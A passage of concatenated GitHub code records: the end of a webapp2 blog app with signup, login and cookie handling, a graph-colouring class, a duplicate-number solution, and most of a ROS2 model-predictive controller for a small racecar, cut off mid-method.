make_microchip_hash(edit_record.poster)\n if micro_check == post_poster:\n if subject and content:\n edit_record.subject = subject\n edit_record.content = content\n edit_record.put()\n self.redirect(\"/blog/\" + post_to_edit)\n else:\n error = \"Please enter both a subject and content.\"\n self.render(\"editpost.html\", subject = subject,\n content = content, poster = poster, error = error,\n post_to_edit = post_to_edit, logged_in = logged_in)\n else:\n self.redirect(\"/blog/login\")\n else:\n if subject and content:\n p = Post(parent = blog_key(), subject = subject,\n content = content, poster = poster)\n p.put()\n 
self.redirect(\"/blog/%s\" % str(p.key().id()))\n else:\n error = \"Please enter both a subject and content.\"\n self.render(\"newpost.html\", subject = subject,\n content = content, poster = poster,\n error = error, logged_in = logged_in)\n\n\n# functions to validate username, password, and email\nUSER_RE = re.compile(r\"^[a-zA-Z0-9_-]{3,20}$\")\ndef valid_username(username):\n return username and USER_RE.match(username)\n\nPASS_RE = re.compile(r\"^.{3,20}$\")\ndef valid_password(password):\n return password and PASS_RE.match(password)\n\nEMAIL_RE = re.compile(r'^[\\S]+@[\\S]+\\.[\\S]+$')\ndef valid_email(email):\n return not email or EMAIL_RE.match(email)\n\n# check to see if the user is already in the database\n# query the users table, count the results and if there is a result return error\ndef new_user(username):\n user = User.all().filter(\"username = \", username)\n result = user.count()\n return result\n\n# checks for a matching username/password pair. Should return 0\n# if no match or 1 if there is a match. Then check the hash of the username and\n# password against the hash plus salt in the db\ndef get_pw_val(username,password):\n result = 0\n user = User.all().filter(\"username = \", username)\n result = user.count()\n if result == 1:\n for p in user.run(limit=1):\n h = p.pw_hash\n return valid_pw(username, password, h)\n else:\n return False\n\n# pertaining to sign up functionality\nclass Signup(BlogHandler):\n def get(self):\n self.render(\"signup.html\", sign_page = 1)\n\n # after user enters sign up info, verify valid input\n def post(self):\n have_error = False\n self.username = self.request.get(\"username\")\n self.password = self.request.get(\"password\")\n self.verify = self.request.get(\"verify\")\n self.email = self.request.get(\"email\")\n\n params = dict(username = self.username,\n email = self.email)\n\n if not valid_username(self.username):\n params[\"error_username\"] = \"That's not a valid username.\"\n have_error = True\n elif new_user(self.username) >= 1:\n params[\"error_username\"] = \"That user already exists.\"\n have_error = True\n\n if not valid_password(self.password):\n params[\"error_password\"] = \"That wasn't a valid password.\"\n have_error = True\n elif self.password != self.verify:\n params[\"error_verify\"] = \"Your passwords didn't match.\"\n have_error = True\n\n if not valid_email(self.email):\n params[\"error_email\"] = \"That's not a valid email.\"\n have_error = True\n\n if have_error:\n self.render(\"signup.html\", **params)\n else:\n pw_hash = make_pw_hash(self.username,self.password)\n u = User(pw_hash = pw_hash, username = self.username,\n email = self.email)\n u.put()\n self.login(u)\n self.response.headers.add_header(\"Set-Cookie\",\n \"%s = %s; Path = /\" % (\"current_user\", str(self.username)))\n self.response.headers.add_header(\"Set-Cookie\",\n \"%s = %s; Path = /\" % (\"microchip\", str(make_microchip_hash(self.username))))\n logged_in = self.username\n referred = 1\n self.render(\"welcome.html\", username = self.username,\n referred = referred, logged_in = logged_in)\n\nclass Login(BlogHandler):\n def get(self):\n self.render(\"login.html\", log_page = 1)\n def post(self):\n have_error = False\n username = self.request.get(\"username\")\n password = self.request.get(\"password\")\n\n params = dict(username = username,\n password = password)\n\n if new_user(username) != 1:\n params[\"error_username\"] = \"That user doesn't have an account.\"\n have_error = True\n\n if have_error:\n self.render(\"login.html\", **params)\n else:\n 
pass_check_result = get_pw_val(username,password)\n if pass_check_result == True:\n user = User.all().filter(\"username = \", username).get()\n my_key = str(user.key().id())\n self.set_secure_cookie(\"user_id\", my_key)\n this_user = str(username)\n self.response.headers.add_header(\n \"Set-Cookie\",\n \"%s = %s; Path= /\" % (\"current_user\", this_user))\n self.response.headers.add_header(\n \"Set-Cookie\",\n \"%s = %s; Path= /\" % (\"microchip\", make_microchip_hash(this_user)))\n logged_in = this_user\n referred = 2\n self.render(\"welcome.html\", username = username,\n referred = referred, welcome_page = 1, logged_in = logged_in)\n else:\n params['error_password'] = \"Please check your password.\"\n have_error = True\n self.render(\"login.html\", **params)\n\nclass Logout(BlogHandler):\n def get(self):\n self.response.headers.add_header(\"Set-Cookie\",\n \"user_id=; Path=/\")\n self.response.headers.add_header(\"Set-Cookie\",\n \"current_user=; Path=/\")\n self.response.headers.add_header(\"Set-Cookie\",\n \"microchip=; Path=/\")\n self.redirect(\"/blog/login\")\n\n\napp = webapp2.WSGIApplication([(\"/\", MainPage),\n (\"/blog/signup\", Signup),\n (\"/blog/?\", BlogFront),\n (\"/blog/([0-9]+)\", PostPage),\n (\"/blog/newpost\", NewPost),\n (\"/blog/login\", Login),\n (\"/blog/logout\", Logout),\n (\"/blog/addwag\", AddWag),\n (\"/blog/removewag\", RemoveWag),\n (\"/blog/deletepost\", DeletePost),\n (\"/blog/editpost\", EditPost),\n (\"/blog/addcomment\", AddComment),\n (\"/blog/deletecomment\", DeleteComment),\n (\"/blog/editcomment\", EditComment),\n (\"/blog/savecomment\", SaveComment),\n (\"/blog/welcome\", WelcomeRedirect)\n ],\n debug=True)\n","repo_name":"rijarobinson/animal-stories","sub_path":"blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":21289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"13003240275","text":"from random import randint\n\n\nclass Coloration():\n COLORS = [\"red\", \"green\", \"blue\"]\n\n def __init__(self, graphe):\n self.graphe = graphe\n self.couleurs = {}\n\n def random_coloration(self):\n couleurs = {}\n graph = self.graphe.get_graph()\n for node in graph:\n couleurs[node] = self.COLORS[randint(0, len(self.COLORS)-1)]\n return couleurs\n\n def is_color_ok(self, node):\n for voisin in self.graphe.get_voisin(node):\n if self.couleurs[node] == self.couleurs[voisin]:\n return False\n return True\n\n def verify(self):\n # print(\"Verification du graph\")\n incorrect_node = []\n for node in self.graphe.get_graph().keys():\n if not self.is_color_ok(node):\n # print(\"le graph n'est pas bon car le noeud\", node, \"est mal coloré\")\n incorrect_node += [node]\n return incorrect_node\n\n def change_color(self, node, color=\"random\"):\n if color == \"random\":\n previous_color = self.couleurs[node]\n while self.couleurs[node] == previous_color:\n self.couleurs[node] = self.COLORS[randint(\n 0, len(self.COLORS)-1)]\n else:\n self.couleurs[node] = color\n return self.couleurs[node]\n\n def is_colored(self, node):\n return node in self.couleurs\n\n def remove_color(self, node):\n if node in self.couleurs:\n del self.couleurs[node]\n","repo_name":"Heargo/cours-m2","sub_path":"complexite_algo/tp_2/src/classes/coloration.py","file_name":"coloration.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"4912099631","text":"#-*- coding:utf-8 
-*-\n'''\nDuplicate number in an array\nFind a duplicated number in an array: all numbers in an array nums of length n lie in the range 0 to n-1. Some numbers in the array\nare duplicated, but we do not know how many numbers are duplicated or how many times each repeats. Find any one\nduplicated number in the array.\n\nApproach:\nHash-table method: traverse the array, putting each element into a hash table the first time it is seen; when an element\nis seen a second time, return it directly.\n'''\n\nclass Solution:\n def findRepeatNumber(self,num):\n hahdict = {}\n for i,element in enumerate(num):\n if hahdict.get(element):\n return element\n else:\n hahdict[element] = 1\n\n","repo_name":"15869546886/learngit","sub_path":"Algorithm/剑指offer/lcjz03.py","file_name":"lcjz03.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11398270672","text":"#!/usr/bin/env python3\nimport math\nfrom dataclasses import dataclass, field\n\nimport cvxpy\nimport numpy as np\nimport rclpy\nfrom rclpy.node import Node\nfrom ackermann_msgs.msg import AckermannDrive, AckermannDriveStamped\nfrom geometry_msgs.msg import Point\nfrom geometry_msgs.msg import PoseStamped\nfrom sensor_msgs.msg import LaserScan\nfrom nav_msgs.msg import Odometry\nfrom visualization_msgs.msg import Marker\nfrom visualization_msgs.msg import MarkerArray\n\nfrom utils import nearest_point\n\nfrom scipy.linalg import block_diag\nfrom scipy.sparse import block_diag, csc_matrix, diags\nfrom scipy.interpolate import splev, splprep\nfrom scipy.spatial.transform import Rotation as R\n# TODO CHECK: include needed ROS msg type headers and libraries\n\n\n@dataclass\nclass mpc_config:\n NXK: int = 4 # length of kinematic state vector: z = [x, y, v, yaw]\n NU: int = 2 # length of input vector: u = [steering speed, acceleration]\n TK: int = 24 # finite time horizon length kinematic\n\n # ---------------------------------------------------\n # TODO: you may need to tune the following matrices\n Rk: list = field(\n default_factory=lambda: np.diag([0.01, 100.0])\n ) # input cost matrix, penalty for inputs - [accel, steering_speed]\n Rdk: list = field(\n default_factory=lambda: np.diag([0.01, 100.0])\n ) # input difference cost matrix, penalty for change of inputs - [accel, steering_speed]\n Qk: list = field(\n default_factory=lambda: np.diag([13.5, 13.5, 5.5, 13.0])\n ) # state error cost matrix, for the next (T) prediction time steps [x, y, delta, v, yaw, yaw-rate, beta]\n Qfk: list = field(\n default_factory=lambda: np.diag([13.5, 13.5, 5.5, 13.0])\n ) # final state error matrix, penalty for the final state constraints: [x, y, delta, v, yaw, yaw-rate, beta]\n # ---------------------------------------------------\n\n N_IND_SEARCH: int = 20 # Search index number\n DTK: float = 0.05 # time step [s] kinematic\n dlk: float = 0.03 # dist step [m] kinematic\n LENGTH: float = 0.58 # Length of the vehicle [m]\n WIDTH: float = 0.31 # Width of the vehicle [m]\n WB: float = 0.33 # Wheelbase [m]\n MIN_STEER: float = -0.4189 # maximum steering angle [rad]\n MAX_STEER: float = 0.4189 # maximum steering angle [rad]\n MAX_DSTEER: float = np.deg2rad(180.0) # maximum steering speed [rad/s]\n MAX_SPEED: float = 1.0 # maximum speed [m/s]\n MIN_SPEED: float = 0.0 # minimum backward speed [m/s]\n MAX_ACCEL: float = 1.0 # maximum acceleration [m/ss]\n\n\n@dataclass\nclass State:\n x: float = 0.0\n y: float = 0.0\n delta: float = 0.0\n v: float = 0.0\n yaw: float = 0.0\n yawrate: float = 0.0\n beta: float = 0.0\n\nclass MPC(Node):\n \"\"\" \n Implement Kinematic MPC on the car\n This is just a template, you are free to implement your own node!\n \"\"\"\n def __init__(self):\n super().__init__('mpc_node')\n\n filename = \"sim_points.csv\" \n self.yaw_data = 
np.load('data.npz')\n\n # ROS subscribers and publishers\n # use the MPC as a tracker (similar to pure pursuit)\n self.pose_subscriber = self.create_subscription(Odometry, 'ego_racecar/odom', self.pose_callback, 1)\n self.drive_publisher = self.create_publisher(AckermannDriveStamped, 'drive',1)\n self.goal_points_publisher = self.create_publisher(MarkerArray, 'pp_goal_points',1)\n self.spline_publisher = self.create_publisher(Marker, 'pp_spline',1)\n self.mpc_path_publisher = self.create_publisher(Marker, 'mpc_spline',1)\n self.pp_goal_publisher = self.create_publisher(Marker, 'pp_goal_point',1)\n\n # TODO: get waypoints here\n self.waypoints = load_points(filename, scaler=1)\n spline_data, uout = splprep(self.waypoints.T, s=0, per=True)\n self.x_spline, self.y_spline = splev(np.linspace(0,1,1000), spline_data)\n self.vx , self.vy = splev(np.linspace(0,1,1000), spline_data, der=1)\n\n self.spline_velocity = (self.vx**2 + self.vy**2)**0.5\n # print(len(self.x_spline))\n self.pp_points_data = self.visualize_pp_goal_points()\n self.pp_spline_data = self.visualize_spline()\n\n #Publish Rviz Markers every 2 seconds\n self.timer = self.create_timer(2, self.publish_rviz_data)#Publish waypoints\n\n\n self.config = mpc_config()\n self.odelta_v = None\n self.odelta = None\n self.oa = None\n self.init_flag = 0\n\n # initialize MPC problem\n self.mpc_prob_init()\n\n def pose_callback(self, pose_msg):\n # TODO: extract pose from ROS msg\n # Find the current waypoint to track using methods mentioned in lecture\n current_position = pose_msg.pose.pose.position\n current_quat = pose_msg.pose.pose.orientation\n\n current_lin_vel = pose_msg.twist.twist.linear\n current_ang_vel = pose_msg.twist.twist.angular\n\n quaternion = [current_quat.x, current_quat.y, current_quat.z, current_quat.w]\n euler = (R.from_quat(quaternion)).as_euler('xyz', degrees=False)\n global_car_position = [current_position.x, current_position.y, current_position.z] # Current location of car in world frame\n\n # Calculate immediate goal on Pure Pursuit Trajectory\n spline_points = np.hstack((self.x_spline.reshape(-1,1), self.y_spline.reshape(-1,1), np.zeros_like(self.y_spline.reshape(-1,1))))\n\n\n\n # individual_rays = np.diff(spline_points)\n individual_rays = np.diff(np.roll(spline_points,5)-spline_points)\n\n\n ######### Calculate yaw at each point -->\n # unit_rays = individual_rays/np.reshape(np.linalg.norm(individual_rays,axis =1),(-1,1))\n # yaw_array = np.arccos(np.clip(np.dot(unit_rays, [1.0,0.0]), a_min=-1, a_max=1))\n ######### OR method 2 ->\n yaw_array = self.yaw_data['yaw'].flatten()\n\n # Calculate closest point on spline\n norm_array = np.linalg.norm(spline_points - global_car_position, axis = 1)\n closest_pt_idx = np.argmin(norm_array)\n self.visualize_pt(spline_points[closest_pt_idx])\n\n # Check if car is oriented opposite the spline array direction\n if(closest_pt_idx+10>(len(self.x_spline)-1)): idx = 10 \n else: idx = closest_pt_idx+10\n sample_point = global_2_local(quaternion, spline_points[idx], global_car_position)\n if sample_point[0]>0:\n arangeit = np.arange(len(self.x_spline))\n rollit = np.roll(arangeit, -closest_pt_idx)\n # print(rollit)\n else:\n arangeit = np.flip(np.arange(len(self.x_spline)))\n rollit = np.roll(arangeit, closest_pt_idx)\n \n spline_points = spline_points[rollit]\n self.spline_velocity = self.spline_velocity[rollit]\n yaw_array = yaw_array[rollit]\n\n vehicle_state = State()\n # print(vehicle_state.x)\n vehicle_state.x = current_position.x\n vehicle_state.y = current_position.y\n 
vehicle_state.yaw = euler[-1]\n if vehicle_state.yaw<0:\n vehicle_state.yaw = vehicle_state.yaw + 2*np.pi\n vehicle_state.v = (current_lin_vel.x**2+current_lin_vel.y**2+current_lin_vel.z**2)**0.5\n\n # TODO: Calculate the next reference trajectory for the next T steps\n # with current vehicle pose.\n # ref_x, ref_y, ref_yaw, ref_v are columns of self.waypoints\n ref_x = spline_points[:,0]\n ref_y = spline_points[:,1]\n ref_yaw = yaw_array\n print(vehicle_state.y)\n angle_flip_idx = np.where(ref_yaw<0)\n ref_yaw[angle_flip_idx] = ref_yaw[angle_flip_idx] + 2*np.pi\n print(\"ref_yaw[0] in deg: \",np.rad2deg(ref_yaw[0]))\n print(\"actual yaw in deg: \", np.rad2deg(euler[-1]))\n print(\" \")\n ref_v = self.spline_velocity\n ref_path = self.calc_ref_trajectory(vehicle_state, ref_x, ref_y, ref_yaw, ref_v)\n x0 = [vehicle_state.x, vehicle_state.y, vehicle_state.v, vehicle_state.yaw]\n\n # TODO: solve the MPC control problem\n (\n self.oa,\n self.odelta_v,\n self.ox,\n self.oy,\n oyaw,\n ov,\n state_predict,\n ) = self.linear_mpc_control(ref_path, x0, self.oa, self.odelta_v)\n self.mpc_spline_data = self.visualize_mpc_path()\n\n # TODO: publish drive message.\n steer_output = self.odelta_v[0]\n speed_output = vehicle_state.v + self.oa[0] * self.config.DTK\n\n msg = AckermannDriveStamped()\n # msg.drive.speed = 0.0\n msg.drive.speed = speed_output\n msg.drive.steering_angle = float(steer_output)\n self.drive_publisher.publish(msg)\n\n def mpc_prob_init(self):\n \"\"\"\n Create MPC quadratic optimization problem using cvxpy, solver: OSQP\n Will be solved every iteration for control.\n More MPC problem information here: https://osqp.org/docs/examples/mpc.html\n More QP example in CVXPY here: https://www.cvxpy.org/examples/basic/quadratic_program.html\n \"\"\"\n # Initialize and create vectors for the optimization problem\n # Vehicle State Vector\n self.xk = cvxpy.Variable(\n (self.config.NXK, self.config.TK + 1)\n )\n # Control Input vector\n self.uk = cvxpy.Variable(\n (self.config.NU, self.config.TK)\n )\n objective = 0.0 # Objective value of the optimization problem\n constraints = [] # Create constraints array\n\n # Initialize reference vectors\n self.x0k = cvxpy.Parameter((self.config.NXK,))\n self.x0k.value = np.zeros((self.config.NXK,))\n\n # Initialize reference trajectory parameter\n self.ref_traj_k = cvxpy.Parameter((self.config.NXK, self.config.TK + 1))\n self.ref_traj_k.value = np.zeros((self.config.NXK, self.config.TK + 1))\n\n # Initializes block diagonal form of R = [R, R, ..., R] (NU*T, NU*T)\n R_block = block_diag(tuple([self.config.Rk] * self.config.TK)) # (16,16)\n\n # Initializes block diagonal form of Rd = [Rd, ..., Rd] (NU*(T-1), NU*(T-1))\n Rd_block = block_diag(tuple([self.config.Rdk] * (self.config.TK - 1)))\n # Initializes block diagonal form of Q = [Q, Q, ..., Qf] (NX*T, NX*T)\n Q_block = [self.config.Qk] * (self.config.TK)\n Q_block.append(self.config.Qfk)\n Q_block = block_diag(tuple(Q_block)) # Shape (36, 36)\n\n # Formulate and create the finite-horizon optimal control problem (objective function)\n # The FTOCP has the horizon of T timesteps\n\n # --------------------------------------------------------\n # TODO: fill in the objectives here, you should be using cvxpy.quad_form() somehwhere\n # TODO: Objective part 1: Influence of the control inputs: Inputs u multiplied by the penalty R\n objective += cvxpy.quad_form(cvxpy.vec(self.uk), R_block)\n\n # TODO: Objective part 2: Deviation of the vehicle from the reference trajectory weighted by Q, including final Timestep T 
weighted by Qf\n objective += cvxpy.quad_form(cvxpy.vec(self.xk - self.ref_traj_k), Q_block)\n\n # TODO: Objective part 3: Difference from one control input to the next control input weighted by Rd\n objective += cvxpy.quad_form(cvxpy.vec(cvxpy.diff(self.uk, axis=1)), Rd_block)\n # --------------------------------------------------------\n\n # Constraints 1: Calculate the future vehicle behavior/states based on the vehicle dynamics model matrices\n # Evaluate vehicle Dynamics for next T timesteps\n A_block = []\n B_block = []\n C_block = []\n # init path to zeros\n path_predict = np.zeros((self.config.NXK, self.config.TK + 1))\n for t in range(self.config.TK):\n A, B, C = self.get_model_matrix(\n path_predict[2, t], path_predict[3, t], 0.0\n )\n A_block.append(A)\n B_block.append(B)\n C_block.extend(C)\n\n A_block = block_diag(tuple(A_block))\n B_block = block_diag(tuple(B_block))\n C_block = np.array(C_block)\n\n # [AA] Sparse matrix to CVX parameter for proper stuffing\n # Reference: https://github.com/cvxpy/cvxpy/issues/1159#issuecomment-718925710\n m, n = A_block.shape\n self.Annz_k = cvxpy.Parameter(A_block.nnz)\n data = np.ones(self.Annz_k.size)\n rows = A_block.row * n + A_block.col\n cols = np.arange(self.Annz_k.size)\n Indexer = csc_matrix((data, (rows, cols)), shape=(m * n, self.Annz_k.size))\n\n # Setting sparse matrix data\n self.Annz_k.value = A_block.data\n\n # Now we use this sparse version instead of the old A_ block matrix\n self.Ak_ = cvxpy.reshape(Indexer @ self.Annz_k, (m, n), order=\"C\")\n\n # Same as A\n m, n = B_block.shape\n self.Bnnz_k = cvxpy.Parameter(B_block.nnz)\n data = np.ones(self.Bnnz_k.size)\n rows = B_block.row * n + B_block.col\n cols = np.arange(self.Bnnz_k.size)\n Indexer = csc_matrix((data, (rows, cols)), shape=(m * n, self.Bnnz_k.size))\n self.Bk_ = cvxpy.reshape(Indexer @ self.Bnnz_k, (m, n), order=\"C\")\n self.Bnnz_k.value = B_block.data\n\n # No need for sparse matrices for C as most values are parameters\n self.Ck_ = cvxpy.Parameter(C_block.shape)\n self.Ck_.value = C_block\n\n # -------------------------------------------------------------\n # TODO: Constraint part 1:\n # Add dynamics constraints to the optimization problem\n # This constraint should be based on a few variables:\n # self.xk, self.Ak_, self.Bk_, self.uk, and self.Ck_\n constraints += [cvxpy.vec(self.xk[:, 1:]) == self.Ak_ @ cvxpy.vec(self.xk[:, :-1]) + self.Bk_ @ cvxpy.vec(self.uk) + (self.Ck_)]\n\n # TODO: Constraint part 2:\n # Add constraints on steering, change in steering angle\n # cannot exceed steering angle speed limit. 
Should be based on:\n        #       self.uk, self.config.MAX_DSTEER, self.config.DTK\n        constraints += [cvxpy.abs(cvxpy.diff(self.uk[1, :]))/self.config.DTK<=self.config.MAX_DSTEER]\n\n        # TODO: Constraint part 3:\n        #       Add constraints on upper and lower bounds of states and inputs\n        #       and initial state constraint, should be based on:\n        #       self.xk, self.x0k, self.config.MAX_SPEED, self.config.MIN_SPEED,\n        #       self.uk, self.config.MAX_ACCEL, self.config.MAX_STEER\n        constraints += [self.xk[:,0]==self.x0k]\n        \n        constraints += [self.xk[2,:]>=self.config.MIN_SPEED]\n        constraints += [self.xk[2,:]<=self.config.MAX_SPEED]\n\n        constraints += [cvxpy.abs(self.uk[0,:])<=self.config.MAX_ACCEL]\n        constraints += [cvxpy.abs(self.uk[1,:])<=self.config.MAX_STEER]\n        # -------------------------------------------------------------\n\n        # Create the optimization problem in CVXPY and setup the workspace\n        # Optimization goal: minimize the objective function\n        self.MPC_prob = cvxpy.Problem(cvxpy.Minimize(objective), constraints)\n\n    def calc_ref_trajectory(self, state, cx, cy, cyaw, sp):\n        \"\"\"\n        calc reference trajectory ref_traj in T steps: [x, y, v, yaw]\n        using the current velocity, calc the T points along the reference path\n        :param cx: Course X-Position\n        :param cy: Course y-Position\n        :param cyaw: Course Heading\n        :param sp: speed profile\n        :dl: distance step\n        :pind: Setpoint Index\n        :return: reference trajectory ref_traj, reference steering angle\n        \"\"\"\n\n        # Create placeholder Arrays for the reference trajectory for T steps\n        ref_traj = np.zeros((self.config.NXK, self.config.TK + 1))\n        ncourse = len(cx)\n\n        # Find nearest index/setpoint from where the trajectories are calculated\n        _, _, _, ind = nearest_point(np.array([state.x, state.y]), np.array([cx, cy]).T)\n\n        # Load the initial parameters from the setpoint into the trajectory\n        ref_traj[0, 0] = cx[ind]\n        ref_traj[1, 0] = cy[ind]\n        ref_traj[2, 0] = sp[ind]\n        ref_traj[3, 0] = cyaw[ind]\n\n        # based on current velocity, distance traveled on the ref line between time steps\n        travel = abs(state.v) * self.config.DTK\n        dind = travel / self.config.dlk\n        ind_list = int(ind) + np.insert(\n            np.cumsum(np.repeat(dind, self.config.TK)), 0, 0\n        ).astype(int)\n        ind_list[ind_list >= ncourse] -= ncourse\n        ref_traj[0, :] = cx[ind_list]\n        ref_traj[1, :] = cy[ind_list]\n        ref_traj[2, :] = sp[ind_list]\n        cyaw[cyaw - state.yaw > 4.5] = np.abs(\n            cyaw[cyaw - state.yaw > 4.5] - (2 * np.pi)\n        )\n        cyaw[cyaw - state.yaw < -4.5] = np.abs(\n            cyaw[cyaw - state.yaw < -4.5] + (2 * np.pi)\n        )\n        ref_traj[3, :] = cyaw[ind_list]\n\n        return ref_traj\n\n    def predict_motion(self, x0, oa, od, xref):\n        path_predict = xref * 0.0\n        for i, _ in enumerate(x0):\n            path_predict[i, 0] = x0[i]\n\n        state = State(x=x0[0], y=x0[1], yaw=x0[3], v=x0[2])\n        for (ai, di, i) in zip(oa, od, range(1, self.config.TK + 1)):\n            state = self.update_state(state, ai, di)\n            path_predict[0, i] = state.x\n            path_predict[1, i] = state.y\n            path_predict[2, i] = state.v\n            path_predict[3, i] = state.yaw\n\n        return path_predict\n\n    def update_state(self, state, a, delta):\n\n        # input check\n        if delta >= self.config.MAX_STEER:\n            delta = self.config.MAX_STEER\n        elif delta <= -self.config.MAX_STEER:\n            delta = -self.config.MAX_STEER\n\n        state.x = state.x + state.v * math.cos(state.yaw) * self.config.DTK\n        state.y = state.y + state.v * math.sin(state.yaw) * self.config.DTK\n        state.yaw = (\n            state.yaw + (state.v / self.config.WB) * math.tan(delta) * self.config.DTK\n        )\n        state.v = state.v + a * self.config.DTK\n\n        if state.v > 
self.config.MAX_SPEED:\n state.v = self.config.MAX_SPEED\n elif state.v < self.config.MIN_SPEED:\n state.v = self.config.MIN_SPEED\n\n return state\n\n def get_model_matrix(self, v, phi, delta):\n \"\"\"\n Calc linear and discrete time dynamic model-> Explicit discrete time-invariant\n Linear System: Xdot = Ax +Bu + C\n State vector: x=[x, y, v, yaw]\n :param v: speed\n :param phi: heading angle of the vehicle\n :param delta: steering angle: delta_bar\n :return: A, B, C\n \"\"\"\n\n # State (or system) matrix A, 4x4\n A = np.zeros((self.config.NXK, self.config.NXK))\n A[0, 0] = 1.0\n A[1, 1] = 1.0\n A[2, 2] = 1.0\n A[3, 3] = 1.0\n A[0, 2] = self.config.DTK * math.cos(phi)\n A[0, 3] = -self.config.DTK * v * math.sin(phi)\n A[1, 2] = self.config.DTK * math.sin(phi)\n A[1, 3] = self.config.DTK * v * math.cos(phi)\n A[3, 2] = self.config.DTK * math.tan(delta) / self.config.WB\n\n # Input Matrix B; 4x2\n B = np.zeros((self.config.NXK, self.config.NU))\n B[2, 0] = self.config.DTK\n B[3, 1] = self.config.DTK * v / (self.config.WB * math.cos(delta) ** 2)\n\n C = np.zeros(self.config.NXK)\n C[0] = self.config.DTK * v * math.sin(phi) * phi\n C[1] = -self.config.DTK * v * math.cos(phi) * phi\n C[3] = -self.config.DTK * v * delta / (self.config.WB * math.cos(delta) ** 2)\n\n return A, B, C\n\n def mpc_prob_solve(self, ref_traj, path_predict, x0):\n self.x0k.value = x0\n\n A_block = []\n B_block = []\n C_block = []\n for t in range(self.config.TK):\n A, B, C = self.get_model_matrix(\n path_predict[2, t], path_predict[3, t], 0.0\n )\n A_block.append(A)\n B_block.append(B)\n C_block.extend(C)\n\n A_block = block_diag(tuple(A_block))\n B_block = block_diag(tuple(B_block))\n C_block = np.array(C_block)\n\n self.Annz_k.value = A_block.data\n self.Bnnz_k.value = B_block.data\n self.Ck_.value = C_block\n\n self.ref_traj_k.value = ref_traj\n\n # Solve the optimization problem in CVXPY\n # Solver selections: cvxpy.OSQP; cvxpy.GUROBI\n self.MPC_prob.solve(solver=cvxpy.OSQP, verbose=False, warm_start=True)\n\n if (\n self.MPC_prob.status == cvxpy.OPTIMAL\n or self.MPC_prob.status == cvxpy.OPTIMAL_INACCURATE\n ):\n ox = np.array(self.xk.value[0, :]).flatten()\n oy = np.array(self.xk.value[1, :]).flatten()\n ov = np.array(self.xk.value[2, :]).flatten()\n oyaw = np.array(self.xk.value[3, :]).flatten()\n oa = np.array(self.uk.value[0, :]).flatten()\n odelta = np.array(self.uk.value[1, :]).flatten()\n\n else:\n print(\"Error: Cannot solve mpc..\")\n oa, odelta, ox, oy, oyaw, ov = None, None, None, None, None, None\n\n return oa, odelta, ox, oy, oyaw, ov\n\n def linear_mpc_control(self, ref_path, x0, oa, od):\n \"\"\"\n MPC control with updating operational point iteratively\n :param ref_path: reference trajectory in T steps\n :param x0: initial state vector\n :param oa: acceleration of T steps of last time\n :param od: delta of T steps of last time\n \"\"\"\n\n if oa is None or od is None:\n oa = [0.0] * self.config.TK\n od = [0.0] * self.config.TK\n\n # Call the Motion Prediction function: Predict the vehicle motion for x-steps\n path_predict = self.predict_motion(x0, oa, od, ref_path)\n poa, pod = oa[:], od[:]\n\n # Run the MPC optimization: Create and solve the optimization problem\n mpc_a, mpc_delta, mpc_x, mpc_y, mpc_yaw, mpc_v = self.mpc_prob_solve(\n ref_path, path_predict, x0\n )\n\n return mpc_a, mpc_delta, mpc_x, mpc_y, mpc_yaw, mpc_v, path_predict\n\n ########################### VISUALIZATION ############################\n def visualize_pt(self, point):\n array_values=MarkerArray()\n\n message = Marker()\n 
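# configure a single sphere marker at the query point and publish it for RViz\n        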
message.header.frame_id=\"map\"\n message.header.stamp = self.get_clock().now().to_msg()\n message.type= Marker.SPHERE\n message.action = Marker.ADD\n message.id=0\n message.pose.orientation.x=0.0\n message.pose.orientation.y=0.0\n message.pose.orientation.z=0.0\n message.pose.orientation.w=1.0\n message.scale.x=0.2\n message.scale.y=0.2\n message.scale.z=0.2\n message.color.a=1.0\n message.color.r=1.0\n message.color.b=1.0\n message.color.g=0.0\n message.pose.position.x=float(point[0])\n message.pose.position.y=float(point[1])\n message.pose.position.z=0.0\n message.lifetime.nanosec=int(1e8)\n\n array_values.markers.append(message)\n self.pp_goal_publisher.publish(message)\n \n def visualize_pp_goal_points(self):\n array_values=MarkerArray()\n\n for i in range(len(self.waypoints)):\n message = Marker()\n message.header.frame_id=\"map\"\n message.header.stamp = self.get_clock().now().to_msg()\n message.type= Marker.SPHERE\n message.action = Marker.ADD\n message.id=i\n message.pose.orientation.x=0.0\n message.pose.orientation.y=0.0\n message.pose.orientation.z=0.0\n message.pose.orientation.w=1.0\n message.scale.x=0.2\n message.scale.y=0.2\n message.scale.z=0.2\n message.color.a=1.0\n message.color.r=1.0\n message.color.b=0.0\n message.color.g=0.0\n message.pose.position.x=float(self.waypoints[i,0])\n message.pose.position.y=float(self.waypoints[i,1])\n message.pose.position.z=0.0\n array_values.markers.append(message)\n return array_values\n \n def visualize_spline(self):\n\n message = Marker()\n message.header.frame_id=\"map\"\n message.type= Marker.LINE_STRIP\n message.action = Marker.ADD\n message.pose.position.x= 0.0\n message.pose.position.y= 0.0\n message.pose.position.z=0.0\n message.pose.orientation.x=0.0\n message.pose.orientation.y=0.0\n message.pose.orientation.z=0.0\n message.pose.orientation.w=1.0\n message.scale.x=0.05\n\n for i in range(len(self.x_spline)-1):\n clr = 1 - (self.spline_velocity[i]-np.min(self.spline_velocity))/(np.max(self.spline_velocity) - np.min(self.spline_velocity))\n message.color.a=1.0\n message.color.r=clr\n message.color.b=clr\n message.color.g=clr\n\n message.id=i\n message.header.stamp = self.get_clock().now().to_msg()\n\n point1 = Point()\n point1.x = float(self.x_spline[i])\n point1.y = float(self.y_spline[i])\n point1.z = 0.0\n message.points.append(point1)\n\n point2 = Point()\n point2.x = float(self.x_spline[i+1])\n point2.y = float(self.y_spline[i+1])\n point2.z = 0.0\n message.points.append(point2)\n self.spline_publisher.publish(message)\n\n return message\n \n def visualize_mpc_path(self):\n\n message = Marker()\n message.header.frame_id=\"map\"\n message.type= Marker.LINE_STRIP\n message.action = Marker.ADD\n message.pose.position.x= 0.0\n message.pose.position.y= 0.0\n message.pose.position.z=0.0\n message.pose.orientation.x=0.0\n message.pose.orientation.y=0.0\n message.pose.orientation.z=0.0\n message.pose.orientation.w=1.0\n message.scale.x=0.05\n message.color.r=1.0\n 